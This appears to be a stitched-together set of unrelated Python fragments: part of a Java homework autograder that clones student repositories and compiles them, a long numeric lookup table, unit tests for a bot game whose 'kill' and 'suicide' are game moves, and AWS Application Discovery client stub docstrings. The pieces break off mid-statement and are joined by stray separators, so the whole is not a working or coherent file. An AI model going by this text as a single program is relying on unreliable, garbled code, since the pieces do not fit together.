        gitURL = HTTPS_STR + sysUser + ":" + sysPwd + "@" + makeProjURL(GITHUB_PROJ_BASE_URL, projName, studentGithubUser) + ".git"
        output = subprocess.check_output(['git', 'clone', gitURL], cwd=studentWorkingDirectory,
                                         stderr=subprocess.STDOUT)
        printToReport(studentReport, output.decode("utf-8").replace("\n", "\n\t"))
        printToReport(studentReport, "[GITWORK DONE]")
    # BUG FIX: was a bare ``except:`` which also swallowed KeyboardInterrupt
    # and SystemExit; only expected clone failures are caught now.
    except (subprocess.CalledProcessError, OSError):
        print("Unable to sync for student: " + studentGithubUser + " for project: " + projName)
def tryCompile( studentReport, chapterDir, javaFile):
    """Compile *javaFile* in *chapterDir* with javac.

    Returns 0 on success, 1 on a compile error, 2 if the file is missing.
    All outcomes are logged to studentReport.
    """
    printToReport(studentReport, "[COMPILING] " + javaFile)
    if not os.path.isfile(chapterDir+'/'+ javaFile):
        printToReport(studentReport, "\t[ERROR] Missing Compile Target:" + javaFile)
        return 2
    proc = Popen(['javac', javaFile], cwd=chapterDir, stdout=PIPE, stdin=PIPE, stderr=STDOUT)
    compile_output = proc.communicate()[0]
    if proc.returncode != 0:
        printToReport(studentReport,
                      "\t[ERROR] javac failed " + javaFile + " " + compile_output.decode("utf-8").replace("\n", "\n\t"))
        return 1
    printToReport(studentReport, "\t[SUCCESSFUL COMPILE] " + javaFile)
    return 0
def tryRun( studentReport, chapterDir, target):
    """Run the compiled class *target* in *chapterDir*, feeding '13\\n' on stdin.

    Returns 0 on success, 1 if the .class file is missing, 3 on a runtime
    error.  Program output (or the error trace) is logged to studentReport.
    """
    if not os.path.isfile(chapterDir + '/' + target + ".class"):
        return 1
    printToReport(studentReport, "[RUNNING] " + target + "\n-->")
    proc = Popen(['java', target], cwd=chapterDir,
                 stdout=PIPE, stdin=PIPE, stderr=PIPE)
    captured = proc.communicate(input=b'13\n')
    if proc.returncode != 0:
        printToReport(studentReport, "\t[ERROR] Runtime Error @ java " + target + "\n" +
                      captured[0].decode("utf-8").replace("\n", "\n\t") )
        return 3
    printToReport(studentReport, captured[0].decode("utf-8").replace("\n", "\n\t"))
    printToReport(studentReport, "<--\n\t[OUTPUT OK]\n" )
    return 0
def copyTest(TESTS_DIR, chapterDir, testTarget):
    """Copy ``<testTarget>.java`` from TESTS_DIR into chapterDir, if present.

    Missing test files are silently skipped (not every chapter has one).
    """
    javaFile = testTarget + ".java"
    source_path = TESTS_DIR + '/' + javaFile
    if os.path.isfile(source_path):
        copyfile(source_path, chapterDir + "/" + javaFile)
def handle_think_java( stuProjDir, studentReport, studentGithubUser ):
#Chapter assignments
ch2Descriptor = {
"assignment_dir": "chapter2",
"targets" : ["Date", "Time"], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "COMPILES" #How to verify assignment
}
ch3Descriptor = {
"assignment_dir": "chapter3",
"targets" : ["Exercise3", "Exercise4"], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "COMPILES" #How to verify assignment
}
ch4Descriptor = {
"assignment_dir": "chapter4",
"targets" : ["Multadd"], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "COMPILES" #How to verify assignment
}
ch6Descriptor = {
"assignment_dir": "chapter6",
"targets" : [("Exercise4","Ch6Ex4"), ("Exercise5","Ch6Ex5")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST", #How to verify assignment
}
swetterCise1 = {
"assignment_dir": "chapter6",
"targets" : [("Swettercise1", "SwetterciseTest")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST",
}
ch7DescriptorA = {
"assignment_dir": "chapter7",
"targets" : [("Exercise3","TestCh7Ex3"), ("Exercise4","TestCh7Ex4")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST", #How to verify assignment
}
ch7DescriptorB = {
"assignment_dir": "chapter7",
"targets" : [("Exercise5","TestCh7Ex5"), ("Exercise6","TestCh7Ex6"), ("Exercise8", "TestCh7Ex8")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST", #How to verify assignment
}
ch11Descriptor = {
"assignment_dir": "chapter11",
"targets" : [("Tile","TestTile")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST", #How to verify assignment
}
ch12Descriptor = {
"assignment_dir": "chapter12",
"targets" : [("CheckPokerHands","TestCheckPokerHands")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST", #How to verify assignment
}
#Assignments are collection of chapter assignments
think_java_assignments = {
"Think Java: Ch2-ch4" : { #<-- key, value is map
"work": [ch2Descriptor, ch3Descriptor, ch4Descriptor],
"enabled": True,
"desc": "HW1, Ch2-Ch4" },
"Think Java: Ch6" : { #<-- key, value is map
"work": [ch6Descriptor],
"enabled": True,
"desc": "HW2, Ch 6" },
"Swettercise1" : { #<-- key, value is map
"work": [swetterCise1],
"enabled": True,
"desc": "HW3: Third HW Assignment, Swettercise. Assigned with Chapter6 work" },
" Think Java: Ch7 - pt1 " : { #<-- key, value is map
"work": [ch7DescriptorA],
"enabled": True,
"desc": "HW7: Fourth HW Assignment, Ch7 Ex3 & 4" },
" Think Java: Ch7 - pt2 " : | |
8, 3, 5): (0, 1),
(8, 8, 4, -5): (0, 1),
(8, 8, 4, -4): (0, 1),
(8, 8, 4, -3): (0, 1),
(8, 8, 4, -2): (0, 1),
(8, 8, 4, -1): (0, 1),
(8, 8, 4, 0): (0, 1),
(8, 8, 4, 1): (0, 1),
(8, 8, 4, 2): (0, 1),
(8, 8, 4, 3): (0, 1),
(8, 8, 4, 4): (0, 1),
(8, 8, 4, 5): (0, 1),
(8, 8, 5, -5): (0, 1),
(8, 8, 5, -4): (0, 1),
(8, 8, 5, -3): (0, 1),
(8, 8, 5, -2): (0, 1),
(8, 8, 5, -1): (0, 1),
(8, 8, 5, 0): (0, 1),
(8, 8, 5, 1): (0, 1),
(8, 8, 5, 2): (0, 1),
(8, 8, 5, 3): (0, 1),
(8, 8, 5, 4): (0, 1),
(8, 8, 5, 5): (0, 1),
(8, 9, -5, -5): (0, 1),
(8, 9, -5, -4): (0, 1),
(8, 9, -5, -3): (0, 1),
(8, 9, -5, -2): (0, 1),
(8, 9, -5, -1): (0, 1),
(8, 9, -5, 0): (0, 1),
(8, 9, -5, 1): (0, 1),
(8, 9, -5, 2): (0, 1),
(8, 9, -5, 3): (0, 1),
(8, 9, -5, 4): (0, 1),
(8, 9, -5, 5): (0, 1),
(8, 9, -4, -5): (0, 1),
(8, 9, -4, -4): (0, 1),
(8, 9, -4, -3): (0, 1),
(8, 9, -4, -2): (0, 1),
(8, 9, -4, -1): (0, 1),
(8, 9, -4, 0): (0, 1),
(8, 9, -4, 1): (0, 1),
(8, 9, -4, 2): (0, 1),
(8, 9, -4, 3): (0, 1),
(8, 9, -4, 4): (0, 1),
(8, 9, -4, 5): (0, 1),
(8, 9, -3, -5): (0, 1),
(8, 9, -3, -4): (0, 1),
(8, 9, -3, -3): (0, 1),
(8, 9, -3, -2): (0, 1),
(8, 9, -3, -1): (0, 1),
(8, 9, -3, 0): (0, 1),
(8, 9, -3, 1): (0, 1),
(8, 9, -3, 2): (0, 1),
(8, 9, -3, 3): (1, 1),
(8, 9, -3, 4): (1, 1),
(8, 9, -3, 5): (1, 0),
(8, 9, -2, -5): (-1, 1),
(8, 9, -2, -4): (-1, 1),
(8, 9, -2, -3): (-1, 1),
(8, 9, -2, -2): (-1, 1),
(8, 9, -2, -1): (-1, 1),
(8, 9, -2, 0): (1, 1),
(8, 9, -2, 1): (1, 1),
(8, 9, -2, 2): (1, 1),
(8, 9, -2, 3): (1, 1),
(8, 9, -2, 4): (1, 1),
(8, 9, -2, 5): (1, 0),
(8, 9, -1, -5): (-1, 0),
(8, 9, -1, -4): (-1, 1),
(8, 9, -1, -3): (-1, 1),
(8, 9, -1, -2): (-1, 1),
(8, 9, -1, -1): (1, 1),
(8, 9, -1, 0): (1, 1),
(8, 9, -1, 1): (1, 1),
(8, 9, -1, 2): (1, 1),
(8, 9, -1, 3): (1, 1),
(8, 9, -1, 4): (1, 1),
(8, 9, -1, 5): (1, 0),
(8, 9, 0, -5): (1, 1),
(8, 9, 0, -4): (1, 1),
(8, 9, 0, -3): (1, 1),
(8, 9, 0, -2): (1, 1),
(8, 9, 0, -1): (1, 1),
(8, 9, 0, 0): (1, 1),
(8, 9, 0, 1): (0, 1),
(8, 9, 0, 2): (0, 1),
(8, 9, 0, 3): (0, 1),
(8, 9, 0, 4): (0, 1),
(8, 9, 0, 5): (0, 1),
(8, 9, 1, -5): (1, 1),
(8, 9, 1, -4): (1, 1),
(8, 9, 1, -3): (1, 1),
(8, 9, 1, -2): (1, 1),
(8, 9, 1, -1): (0, 1),
(8, 9, 1, 0): (0, 1),
(8, 9, 1, 1): (-1, 1),
(8, 9, 1, 2): (-1, 1),
(8, 9, 1, 3): (-1, 1),
(8, 9, 1, 4): (-1, 1),
(8, 9, 1, 5): (-1, 1),
(8, 9, 2, -5): (0, 1),
(8, 9, 2, -4): (0, 1),
(8, 9, 2, -3): (0, 1),
(8, 9, 2, -2): (0, 1),
(8, 9, 2, -1): (0, 1),
(8, 9, 2, 0): (-1, 1),
(8, 9, 2, 1): (-1, 1),
(8, 9, 2, 2): (-1, 1),
(8, 9, 2, 3): (-1, 1),
(8, 9, 2, 4): (-1, 1),
(8, 9, 2, 5): (-1, 1),
(8, 9, 3, -5): (0, 1),
(8, 9, 3, -4): (0, 1),
(8, 9, 3, -3): (0, 1),
(8, 9, 3, -2): (0, 1),
(8, 9, 3, -1): (0, 1),
(8, 9, 3, 0): (0, 1),
(8, 9, 3, 1): (0, 1),
(8, 9, 3, 2): (0, 1),
(8, 9, 3, 3): (0, 1),
(8, 9, 3, 4): (0, 1),
(8, 9, 3, 5): (0, 1),
(8, 9, 4, -5): (0, 1),
(8, 9, 4, -4): (0, 1),
(8, 9, 4, -3): (0, 1),
(8, 9, 4, -2): (0, 1),
(8, 9, 4, -1): (0, 1),
(8, 9, 4, 0): (0, 1),
(8, 9, 4, 1): (0, 1),
(8, 9, 4, 2): (0, 1),
(8, 9, 4, 3): (0, 1),
(8, 9, 4, 4): (0, 1),
(8, 9, 4, 5): (0, 1),
(8, 9, 5, -5): (0, 1),
(8, 9, 5, -4): (0, 1),
(8, 9, 5, -3): (0, 1),
(8, 9, 5, -2): (0, 1),
(8, 9, 5, -1): (0, 1),
(8, 9, 5, 0): (0, 1),
(8, 9, 5, 1): (0, 1),
(8, 9, 5, 2): (0, 1),
(8, 9, 5, 3): (0, 1),
(8, 9, 5, 4): (0, 1),
(8, 9, 5, 5): (0, 1),
(8, 10, -5, -5): (0, 1),
(8, 10, -5, -4): (0, 1),
(8, 10, -5, -3): (0, 1),
(8, 10, -5, -2): (0, 1),
(8, 10, -5, -1): (0, 1),
(8, 10, -5, 0): (0, 1),
(8, 10, -5, 1): (0, 1),
(8, 10, -5, 2): (0, 1),
(8, 10, -5, 3): (0, 1),
(8, 10, -5, 4): (0, 1),
(8, 10, -5, 5): (0, 1),
(8, 10, -4, -5): (0, 1),
(8, 10, -4, -4): (0, 1),
(8, 10, -4, -3): (0, 1),
(8, 10, -4, -2): (0, 1),
(8, 10, -4, -1): (0, 1),
(8, 10, -4, 0): (0, 1),
(8, 10, -4, 1): (0, 1),
(8, 10, -4, 2): (0, 1),
(8, 10, -4, 3): (0, 1),
(8, 10, -4, 4): (0, 1),
(8, 10, -4, 5): (0, 1),
(8, 10, -3, -5): (0, 1),
(8, 10, -3, -4): (0, 1),
(8, 10, -3, -3): (0, 1),
(8, 10, -3, -2): (0, 1),
(8, 10, -3, -1): (0, 1),
(8, 10, -3, 0): (0, 1),
(8, 10, -3, 1): (0, 1),
(8, 10, -3, 2): (0, 1),
(8, 10, -3, 3): (1, 1),
(8, 10, -3, 4): (1, 1),
(8, 10, -3, 5): (1, 0),
(8, 10, -2, -5): (-1, 1),
(8, 10, -2, -4): (-1, 1),
(8, 10, -2, -3): (-1, 1),
(8, 10, -2, -2): (-1, 1),
(8, 10, -2, -1): (-1, 1),
(8, 10, -2, 0): (1, 1),
(8, 10, -2, 1): (1, 1),
(8, 10, -2, 2): (1, 1),
(8, 10, -2, 3): (1, 1),
(8, 10, -2, 4): (1, 1),
(8, 10, -2, 5): (1, 0),
(8, 10, -1, -5): (-1, 1),
(8, 10, -1, -4): (-1, 1),
(8, 10, -1, -3): (-1, 1),
(8, 10, -1, -2): (-1, 1),
(8, 10, -1, -1): (1, 1),
(8, 10, -1, 0): (1, 1),
(8, 10, -1, 1): (1, 1),
(8, 10, -1, 2): (1, 1),
(8, 10, -1, 3): (1, 1),
(8, 10, -1, 4): (1, 0),
(8, 10, -1, 5): (1, -1),
(8, 10, 0, -5): (1, 1),
(8, 10, 0, -4): (1, 1),
(8, 10, 0, -3): (1, 1),
(8, 10, 0, -2): (1, 1),
(8, 10, 0, -1): (1, 1),
(8, 10, 0, 0): (1, 1),
(8, 10, 0, 1): (0, 1),
(8, 10, 0, 2): (0, 1),
(8, 10, 0, 3): (0, 1),
(8, 10, 0, 4): (0, 0),
(8, 10, 0, 5): (0, -1),
(8, 10, 1, -5): (1, 1),
(8, 10, 1, -4): (1, 1),
(8, 10, 1, -3): (1, 1),
(8, 10, 1, | |
lambda bot, s: (bot.position, s)
parsed_l0 = layout.parse_layout(l0)
for bot in (0, 2):
game_state = setup_game([stopping, stopping], layout_dict=parsed_l0)
game_state['turn'] = bot
# get position of bots 1 (and 3)
kill_position = game_state['bots'][1]
assert kill_position == game_state['bots'][3]
new_state = apply_move(game_state, kill_position)
# team 0 scores twice
assert new_state['score'] == [10, 0]
# bots 1 and 3 are back to origin
assert new_state['bots'][1::2] == [(6, 2), (6, 1)]
parsed_l1 = layout.parse_layout(l1)
for bot in (1, 3):
game_state = setup_game([stopping, stopping], layout_dict=parsed_l1)
game_state['turn'] = bot
# get position of bots 0 (and 2)
kill_position = game_state['bots'][0]
assert kill_position == game_state['bots'][2]
new_state = apply_move(game_state, kill_position)
# team 1 scores twice
assert new_state['score'] == [0, 10]
# bots 0 and 2 are back to origin
assert new_state['bots'][0::2] == [(1, 1), (1, 2)]
def test_suicide():
    """ Check that suicide works.

        A bot that moves onto an enemy inside the enemy's home half kills
        itself: the enemy team scores 5 and the mover respawns at its origin.
    """
    # l0: red bots (3, 1) stand on blue's half next to blue bot 2;
    # l1: the mirror image for the blue bots.
    l0 = """
    ########
    #  ..  #
    #3210  #
    ########
    """
    l1 = """
    ########
    #  ..  #
    #  1032#
    ########
    """
    # dummy bots
    stopping = lambda bot, s: (bot.position, s)
    parsed_l0 = layout.parse_layout(l0)
    for bot in (1, 3):
        game_state = setup_game([stopping, stopping], layout_dict=parsed_l0)
        game_state['turn'] = bot
        # get position of bot 2
        suicide_position = game_state['bots'][2]
        new_state = apply_move(game_state, suicide_position)
        # team 0 scores
        assert new_state['score'] == [5, 0]
        # the moving bot is back at its origin; its team mate is unchanged
        if bot == 1:
            assert new_state['bots'][1::2] == [(6, 2), (1, 2)]
        elif bot == 3:
            assert new_state['bots'][1::2] == [(3, 2), (6, 1)]
    parsed_l1 = layout.parse_layout(l1)
    for bot in (0, 2):
        game_state = setup_game([stopping, stopping], layout_dict=parsed_l1)
        game_state['turn'] = bot
        # get position of bot 3
        suicide_position = game_state['bots'][3]
        new_state = apply_move(game_state, suicide_position)
        # team 1 scores
        assert new_state['score'] == [0, 5]
def test_cascade_kill():
    """ Kills can cascade: a killed bot respawns at its origin, which may
        already be occupied by an enemy, who is then killed on its next
        applicable turn, and so on.
    """
    # Expected board after each stage; a stage written as two boards
    # expresses two bots occupying the same square.
    cascade = [
        """
        ########
        #1 ..30#
        #     2#
        ########
        """,
        """
        ########
        #0 .. 3#
        #     2#
        ########
        ########
        #1 ..  #
        #      #
        ########
        """,
        """
        ########
        #0 .. 3#
        #     1#
        ########
        ########
        #  ..  #
        #     2#
        ########
        """,
        """
        ########
        #0 .. 3#
        #2    1#
        ########
        """
    ]
    def move(bot, state):
        # Only bot 3 (red team, second bot) moves in round 1 -- onto bot 0.
        if not bot.is_blue and bot.turn == 1 and bot.round == 1:
            return (6, 1)
        return bot.position
    layouts = [layout.parse_layout(l) for l in cascade]
    state = setup_game([move, move], max_rounds=5, layout_dict=layout.parse_layout(cascade[0]))
    assert state['bots'] == layouts[0]['bots']
    state = game.play_turn(state) # Bot 0 stands
    assert state['bots'] == layouts[0]['bots']
    state = game.play_turn(state) # Bot 1 stands
    state = game.play_turn(state) # Bot 2 stands
    state = game.play_turn(state) # Bot 3 moves, kills 0. Bot 0 and 1 are on same spot
    assert state['bots'] == layouts[1]['bots']
    state = game.play_turn(state) # Bot 0 stands, kills 1. Bot 1 and 2 are on same spot
    assert state['bots'] == layouts[2]['bots']
    state = game.play_turn(state) # Bot 1 stands, kills 2.
    assert state['bots'] == layouts[3]['bots']
def test_cascade_kill_2():
    """ Checks that killing occurs only for the bot whose turn it is
        or for any bot that this bot moves onto.
        If a bot respawns on an enemy, it will only be killed when it is its own
        or the enemy’s turn (and neither of them moves).
    """
    # Expected board after each stage; double boards mark shared squares.
    cascade = [
        """
        ########
        #30.. 2#
        #1     #
        ########
        """,
        """
        ########
        #0 .. 2#
        #1     #
        ########
        ########
        #  .. 3#
        #      #
        ########
        """,
        """
        ########
        #0 .. 3#
        #1     #
        ########
        ########
        #  ..  #
        #2     #
        ########
        """,
        """
        ########
        #0 .. 3#
        #2    1#
        ########
        """
    ]
    def move(bot, state):
        # Bot 0 (blue team, first bot) starts the cascade in round 1.
        if bot.is_blue and bot.turn == 0 and bot.round == 1:
            return (1, 1)
        return bot.position
    layouts = [layout.parse_layout(l) for l in cascade]
    state = setup_game([move, move], max_rounds=5, layout_dict=layout.parse_layout(cascade[0]))
    assert state['bots'] == layouts[0]['bots']
    state = game.play_turn(state) # Bot 0 moves, kills 3. Bot 2 and 3 are on same spot
    assert state['bots'] == layouts[1]['bots']
    state = game.play_turn(state) # Bot 1 stands. Bot 2 and 3 are on same spot
    assert state['bots'] == layouts[1]['bots']
    state = game.play_turn(state) # Bot 2 stands, gets killed. Bot 1 and 2 are on same spot
    assert state['bots'] == layouts[2]['bots']
    state = game.play_turn(state) # Bot 3 stands. Bot 1 and 2 are on same spot
    assert state['bots'] == layouts[2]['bots']
    state = game.play_turn(state) # Bot 0 stands. Bot 1 and 2 are on same spot
    assert state['bots'] == layouts[2]['bots']
    state = game.play_turn(state) # Bot 1 stands, kills 2.
    assert state['bots'] == layouts[3]['bots']
def test_cascade_kill_rescue_1():
    """ Checks that killing occurs only for the bot whose turn it is
        or for any bot that this bot moves onto.
        If a bot respawns on an enemy, it will only be killed when it is its own
        or the enemy’s turn (and neither of them moves).
        If the bot moves away before it is the enemy’s turn, it is rescued.
    """
    # Expected board after each stage; double boards mark shared squares.
    cascade = [
        """
        ########
        #30.. 2#
        #1     #
        ########
        """,
        """
        ########
        #0 .. 2#
        #1     #
        ########
        ########
        #  .. 3#
        #      #
        ########
        """,
        """
        ########
        #0 ..23#
        #1     #
        ########
        """
    ]
    def move(bot, state):
        # Bot 0 kills 3 in round 1; bot 2 then steps aside before bot 3's
        # respawn square would get it killed.
        if bot.is_blue and bot.turn == 0 and bot.round == 1:
            return (1, 1)
        if bot.is_blue and bot.turn == 1 and bot.round == 1:
            return (5, 1)
        return bot.position
    layouts = [layout.parse_layout(l) for l in cascade]
    state = setup_game([move, move], max_rounds=5, layout_dict=layout.parse_layout(cascade[0]))
    assert state['bots'] == layouts[0]['bots']
    state = game.play_turn(state) # Bot 0 moves, kills 3. Bot 2 and 3 are on same spot
    assert state['bots'] == layouts[1]['bots']
    state = game.play_turn(state) # Bot 1 stands. Bot 2 and 3 are on same spot
    assert state['bots'] == layouts[1]['bots']
    state = game.play_turn(state) # Bot 2 moves. Rescues itself
    assert state['bots'] == layouts[2]['bots']
def test_cascade_kill_rescue_2():
    """ Checks that killing occurs only for the bot whose turn it is
        or for any bot that this bot moves onto.
        If a bot respawns on an enemy, it will only be killed when it is its own
        or the enemy’s turn (and neither of them moves).
        If the enemy moves away before it is the bot’s turn, the bot is rescued.
    """
    # Expected board after each stage; double boards mark shared squares.
    cascade = [
        """
        ########
        #3 ..  #
        #10   2#
        ########
        """,
        """
        ########
        #3 ..  #
        #0    1#
        ########
        ########
        #  ..  #
        #     2#
        ########
        """,
        """
        ########
        #3 ..  #
        #0   12#
        ########
        """
    ]
    def move(bot, state):
        # Bot 0 kills 1 in round 1; bot 1 (now respawned on 2's square)
        # moves off it before bot 2's turn comes around.
        if bot.is_blue and bot.turn == 0 and bot.round == 1:
            return (1, 2)
        if not bot.is_blue and bot.turn == 0 and bot.round == 1:
            return (5, 2)
        return bot.position
    layouts = [layout.parse_layout(l) for l in cascade]
    state = setup_game([move, move], max_rounds=5, layout_dict=layout.parse_layout(cascade[0]))
    assert state['bots'] == layouts[0]['bots']
    state = game.play_turn(state) # Bot 0 moves, kills 1. Bot 1 and 2 are on same spot
    assert state['bots'] == layouts[1]['bots']
    state = game.play_turn(state) # Bot 1 moves. Bot 2 is rescued.
    assert state['bots'] == layouts[2]['bots']
def test_cascade_suicide():
    """ A suicide can start a kill cascade: the mover dies on the enemy's
        square, respawns on a team mate's origin square, and the chain of
        respawn kills proceeds exactly as for a regular cascade kill.
    """
    # Expected board after each stage; double boards mark shared squares.
    cascade = [
        """
        ########
        #1 ..03#
        #     2#
        ########
        """,
        """
        ########
        #0 .. 3#
        #     2#
        ########
        ########
        #1 ..  #
        #      #
        ########
        """,
        """
        ########
        #0 .. 3#
        #     1#
        ########
        ########
        #  ..  #
        #     2#
        ########
        """,
        """
        ########
        #0 .. 3#
        #2    1#
        ########
        """
    ]
    def move(bot, state):
        # Bot 0 steps onto enemy bot 3 in round 1, committing suicide.
        if bot.is_blue and bot.turn == 0 and bot.round == 1:
            return (6, 1)
        return bot.position
    layouts = [layout.parse_layout(l) for l in cascade]
    state = setup_game([move, move], max_rounds=5, layout_dict=layout.parse_layout(cascade[0]))
    assert state['bots'] == layouts[0]['bots']
    state = game.play_turn(state) # Bot 0 moves onto 3. Gets killed. Bot 0 and 1 are on same spot.
    assert state['bots'] == layouts[1]['bots']
    state = game.play_turn(state) # Bot 1 moves, gets killed. Bot 1 and 2 are on same spot
    assert state['bots'] == layouts[2]['bots']
    state = game.play_turn(state) # Bot 2 moves, gets killed.
    assert state['bots'] == layouts[3]['bots']
def test_moving_through_maze():
test_start = """
######
#0 . #
#.. 1#
#2 3#
###### """
parsed = layout.parse_layout(test_start)
teams = [
stepping_player('>-v>>>-', '-^^->->'),
stepping_player('<<-<<<-', '-------')
]
state = setup_game(teams, layout_dict=parsed, max_rounds=8)
# play first round
for i in range(4):
state = game.play_turn(state)
test_first_round = layout.parse_layout(
""" ######
# 0. #
#..1 #
#2 3#
###### """)
assert test_first_round['bots'] | |
unique identifier that you can use to query the export status.
(string) --
:type maxResults: integer
:param maxResults: The maximum number of results that you want to display as a part of the query.
:type nextToken: string
:param nextToken: A token to get the next set of results. For example, if you specify 100 IDs for DescribeExportConfigurationsRequest$exportIds but set DescribeExportConfigurationsRequest$maxResults to 10, you get results in a set of 10. Use the token in the query to get the next set of 10.
:rtype: dict
:return: {
'exportsInfo': [
{
'exportId': 'string',
'exportStatus': 'FAILED'|'SUCCEEDED'|'IN_PROGRESS',
'statusMessage': 'string',
'configurationsDownloadUrl': 'string',
'exportRequestTime': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
"""
pass
def describe_export_tasks(exportIds=None, maxResults=None, nextToken=None):
    """
    Retrieve status of one or more export tasks. You can retrieve the status of up to 100 export tasks.
    See also: AWS API Documentation
    :example: response = client.describe_export_tasks(
        exportIds=[
            'string',
        ],
        maxResults=123,
        nextToken='string'
    )
    :type exportIds: list
    :param exportIds: One or more unique identifiers used to query the status of an export request.
    (string) --
    :type maxResults: integer
    :param maxResults: The maximum number of volume results returned by DescribeExportTasks in paginated output. When this parameter is used, DescribeExportTasks only returns maxResults results in a single page along with a nextToken response element.
    :type nextToken: string
    :param nextToken: The nextToken value returned from a previous paginated DescribeExportTasks request where maxResults was used and the results exceeded the value of that parameter. Pagination continues from the end of the previous results that returned the nextToken value. This value is null when there are no more results to return.
    :rtype: dict
    :return: {
        'exportsInfo': [
            {
                'exportId': 'string',
                'exportStatus': 'FAILED'|'SUCCEEDED'|'IN_PROGRESS',
                'statusMessage': 'string',
                'configurationsDownloadUrl': 'string',
                'exportRequestTime': datetime(2015, 1, 1)
            },
        ],
        'nextToken': 'string'
    }
    """
    # Generated documentation stub: performs no request; the real call is
    # dispatched through botocore at runtime.
    pass
def describe_tags(filters=None, maxResults=None, nextToken=None):
    """
    Retrieves a list of configuration items that are tagged with a specific tag. Or retrieves a list of all tags assigned to a specific configuration item.
    See also: AWS API Documentation
    :example: response = client.describe_tags(
        filters=[
            {
                'name': 'string',
                'values': [
                    'string',
                ]
            },
        ],
        maxResults=123,
        nextToken='string'
    )
    :type filters: list
    :param filters: You can filter the list using a key -value format. You can separate these items by using logical operators. Allowed filters include tagKey , tagValue , and configurationId .
    (dict) --The tag filter. Valid names are: tagKey , tagValue , configurationId .
    name (string) -- [REQUIRED]A name of the tag filter.
    values (list) -- [REQUIRED]Values for the tag filter.
    (string) --
    :type maxResults: integer
    :param maxResults: The total number of items to return in a single page of output. The maximum value is 100.
    :type nextToken: string
    :param nextToken: A token to start the list. Use this token to get the next set of results.
    :rtype: dict
    :return: {
        'tags': [
            {
                'configurationType': 'SERVER'|'PROCESS'|'CONNECTION'|'APPLICATION',
                'configurationId': 'string',
                'key': 'string',
                'value': 'string',
                'timeOfCreation': datetime(2015, 1, 1)
            },
        ],
        'nextToken': 'string'
    }
    """
    # Generated documentation stub: performs no request; the real call is
    # dispatched through botocore at runtime.
    pass
def disassociate_configuration_items_from_application(applicationConfigurationId=None, configurationIds=None):
    """
    Disassociates one or more configuration items from an application.
    See also: AWS API Documentation
    :example: response = client.disassociate_configuration_items_from_application(
        applicationConfigurationId='string',
        configurationIds=[
            'string',
        ]
    )
    :type applicationConfigurationId: string
    :param applicationConfigurationId: [REQUIRED]
    Configuration ID of an application from which each item is disassociated.
    :type configurationIds: list
    :param configurationIds: [REQUIRED]
    Configuration ID of each item to be disassociated from an application.
    (string) --
    :rtype: dict
    :return: {}
    :returns:
    (dict) --
    """
    # Generated documentation stub: performs no request; the real call is
    # dispatched through botocore at runtime.
    pass
def export_configurations():
    """
    Deprecated -- use StartExportTask instead.

    Exports all discovered configuration data (tags and tag associations,
    processes, connections, servers, and system performance) to an Amazon S3
    bucket or an application that lets you view and evaluate the data.  The
    API returns an export ID that can be queried via the
    DescribeExportConfigurations API.  The system imposes a limit of two
    configuration exports in six hours.
    See also: AWS API Documentation

    :example: response = client.export_configurations()
    :rtype: dict
    :return: {
        'exportId': 'string'
    }
    """
    # Documentation stub only -- no request is made here.
    return None
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
    """
    Generate a presigned url given a client, its method, and arguments

    :type ClientMethod: string
    :param ClientMethod: The client method to presign for

    :type Params: dict
    :param Params: The parameters normally passed to
        ClientMethod.

    :type ExpiresIn: int
    :param ExpiresIn: The number of seconds the presigned url is valid
        for. By default it expires in an hour (3600 seconds)

    :type HttpMethod: string
    :param HttpMethod: The http method to use on the generated url. By
        default, the http method is whatever is used in the method's model.
    """
    # Stub: no implementation in this file; the docstring is the contract.
    pass
def get_discovery_summary():
    """
    Retrieves a short summary of discovered assets.
    See also: AWS API Documentation

    :example: response = client.get_discovery_summary()

    :rtype: dict
    :return: {
        'servers': 123,
        'applications': 123,
        'serversMappedToApplications': 123,
        'serversMappedtoTags': 123,
        'agentSummary': {
            'activeAgents': 123,
            'healthyAgents': 123,
            'blackListedAgents': 123,
            'shutdownAgents': 123,
            'unhealthyAgents': 123,
            'totalAgents': 123,
            'unknownAgents': 123
        },
        'connectorSummary': {
            'activeConnectors': 123,
            'healthyConnectors': 123,
            'blackListedConnectors': 123,
            'shutdownConnectors': 123,
            'unhealthyConnectors': 123,
            'totalConnectors': 123,
            'unknownConnectors': 123
        }
    }
    """
    # Stub: no implementation in this file; the docstring is the contract.
    pass
def get_paginator(operation_name=None):
    """
    Create a paginator for an operation.

    :type operation_name: string
    :param operation_name: The operation name. This is the same name
        as the method name on the client. For example, if the
        method name is create_foo, and you'd normally invoke the
        operation as client.create_foo(**kwargs), if the
        create_foo operation can be paginated, you can use the
        call client.get_paginator('create_foo').

    :rtype: L{botocore.paginate.Paginator}
    """
    # Stub: no implementation in this file; the docstring is the contract.
    pass
def get_waiter():
    """
    (Undocumented stub — presumably mirrors botocore's ``Client.get_waiter``;
    TODO confirm against the service model.)
    """
    pass
def list_configurations(configurationType=None, filters=None, maxResults=None, nextToken=None, orderBy=None):
"""
Retrieves a list of configuration items according to criteria that you specify in a filter. The filter criteria identifies the relationship requirements.
See also: AWS API Documentation
:example: response = client.list_configurations(
configurationType='SERVER'|'PROCESS'|'CONNECTION'|'APPLICATION',
filters=[
{
'name': 'string',
'values': [
'string',
],
'condition': 'string'
},
],
maxResults=123,
nextToken='string',
orderBy=[
{
'fieldName': 'string',
'sortOrder': 'ASC'|'DESC'
},
]
)
:type configurationType: string
:param configurationType: [REQUIRED]
A valid configuration identified by Application Discovery Service.
:type filters: list
:param filters: You can filter the request using various logical operators and a key -value format. For example:
{'key': 'serverType', 'value': 'webServer'}
For a complete list of filter options and guidance about using them with this action, see Querying Discovered Configuration Items .
(dict) --A filter that can use conditional operators.
For more information about filters, see Querying Discovered Configuration Items .
name (string) -- [REQUIRED]The name of the filter.
